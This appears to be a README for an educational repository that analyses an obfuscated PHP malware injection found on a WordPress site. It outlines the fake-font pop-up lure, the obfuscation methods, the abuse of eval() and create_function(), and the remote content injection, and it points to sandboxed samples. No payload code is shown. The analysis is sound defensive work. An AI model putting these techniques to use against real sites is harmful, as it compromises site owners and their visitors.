My friend who runs a WordPress site had received some feedback regarding an unusual pop-up that would appear on his site saying "The HoeflerText font wasn't found".
After investigating the source files I noticed some non-WordPress files and additionally 1 line of coding (that looks malicious) in lots and lots of the .php files there.
Now, this malware is not new and has been around for some years. However, I've uploaded this for the following reasons:
- For educational purposes
- Teach you how to decode obfuscated code and what to look out for. You will learn how the person who wrote this used a range of substitution and transposition techniques, including octal and hex values to obfuscate their code so as to avoid detection from major search engines
- How
eval()andcreate_function()functions are exploited in this attack. Note:create_function()will be deprecated in PHP 7.2.0.eval()function is very dangerous and its use is discouraged. Even a seemlingly harmless function likegethostbyname()is used to their advantage. - For developers who might want to use this 1 line of code to do a find and replace on their WordPress codebase
For those wanting to run this script to learn how it works I recommend running this in a sandbox environment.
Start from 1-malware.php and work your way progressively through each files.
I've annotated my comments after a statement rather than before it. For example,
<?php
echo 'hello world';
// my annotation is after the echo statement aboveSo, you'll analyse the code first and see what my comments is afterwards, which hopefully will flow nicely.
Downloads content from a remote server (the attacker's) and injects it into your HTML markup just before the closing </body> or </html> tag.
Simple answer is yes because major search engines are starting to flag websites that they feel have been compromised. As such, your website's listing on these search engines will be affected. The link below is Google's approach to making the web safer. https://www.google.com/transparencyreport/safebrowsing/